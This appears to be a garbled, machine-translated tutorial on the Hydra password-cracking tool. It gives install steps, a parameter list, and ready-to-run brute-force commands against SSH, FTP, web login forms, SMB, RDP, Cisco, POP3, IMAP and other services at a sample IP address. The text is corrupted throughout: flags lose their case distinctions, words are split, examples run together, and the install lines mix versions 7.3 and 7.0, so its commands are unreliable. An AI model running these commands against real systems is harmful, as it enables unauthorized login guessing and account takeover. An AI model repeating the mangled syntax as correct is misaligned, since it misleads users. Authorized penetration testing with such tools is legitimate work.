hydra:http://www.thc.org/releases/hydra-7.3.tar.gz# tar zxvf hydra-7.0-src.tar.gz# cd hydra-7.0-src#./configure# make# make Installhydra supports GUI graphical interface, but the habit is still good command. Iii. parameter Description Hydra [[[-L LOGIN|-L file] [-P pass|-p file]] | [-c FILE]] [-e NS] [-O FILE] [-T TASKS] [-M FILE [-t TASKS]] [-W Time] [-F] [-S PORT] [-S] [-VV] Server service [opt]-r continues to crack from the last progress. -S uses SSL links. -S port allows you to specify a nondefault port with this parameter. -L LOGIN Specifies the cracked user to crack for a specific user. -L FILE Specifies the user name dictionary. -P PASS Lowercase, specify password cracking, less use, usually using a password dictionary. -P FILE Uppercase, specifying the password dictionary. -e ns Optional option, N: null password heuristic, s: Use specified user and password heuristics. -C FILE uses a colon-delimited format, such as "Login: password" instead of the-l/-p parameter. -m file specifies a single line of target list files. -o file specifies the result output files. -F after using the-m parameter, find the first pair of login or password to stop the crack. The number of threads running concurrently with-T TASKS, which defaults to 16. -W time sets the maximum timeout, in seconds, which is 30s by default. -V/-V displays detailed procedures. Server target ipservice Specifies the service name, supported services and protocols: Telnet FTP POP3[-NTLM] IMAP[-NTLM] SMB smbnt Http-{head|get} http-{get|post}-form Http-proxy Cisco cisco-enable VNC ldap2 ldap3 MSSQL mysql oracle-listener postgres NNTP socks5 rexec rlogin pcnfs SNMP rsh CVS svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak SIP VMAUTHD Firebird NCP AFP et cetera. Opt optional Four, example 1, crack ssh:hydra-l user name-p password Dictionary-t thread-vv-e NS IP sshhydra-l user name-p password Dictionary-t thread-o save.log-vv ip ssh2, crack ftp:hyd RA IP ftp-l user name-p password Dictionary-t thread (default)-vvhydra IP ftp-l Username-p password dictionary-e ns-vv3, get way commit, Hack Web login: hydra-l user name-p password Dictionary-t thread -VV-E NS IP http-get/admin/ hydra-l user name-p password Dictionary-t thread-vv-e ns-f IP http-get/admin/index. PHP4, post, hack Web login: hydra-l username-p password Dictionary-s-IP http-post-form "/admin/login.php:username=^user^&password=^pass ^&submit=login:sorry password "hydra-t 3-l admin-p pass.txt-o out.txt-f 10.36.16.18 http-post-form" login.php:id=^ User^&passwd=^pass^:<title>wrong username or password</title> "(parameter description:-T simultaneous thread count 3,-l username is admin, Dictionary pass.txt, Save as Out.txt,-f when cracked a password to stop, 10.36.16.18 target ip,http-post-form to crack is to use the HTTP POST way to submit form password cracking,<title> The content in the message is the return information hint that represents the error guess. 5, cracked https:hydra-m/index.php-l muts-p pass.txt 10.36.16.18 https6, cracked teamspeak: hydra-l user name-p password Dictionary-s port number-VV IP Teamspeak7, cracked cisco:hydra-p pass.txt 10.36.16.18 ciScohydra-m cloud-p pass.txt 10.36.16.18 cisco-enable8, cracked smb:hydra-l administrator-p pass.txt 10.36.16.18 smb9, cracked pop3:h Ydra-l muts-p pass.txt my.pop3.mail pop310, cracked rdp:hydra IP rdp-l administrator-p pass.txt-v11, cracked http-proxy:hydra-l ad Min-p pass.txt http-proxy://10.36.16.1812, cracked imap:hydra-l user.txt-p secret 10.36.16.18 IMAP PLAINHYDRA-C Defaults.txt -6 Imap://[fe80::2c:31ff:fe12:ac11]:143/plain
Hydra Options "original collection"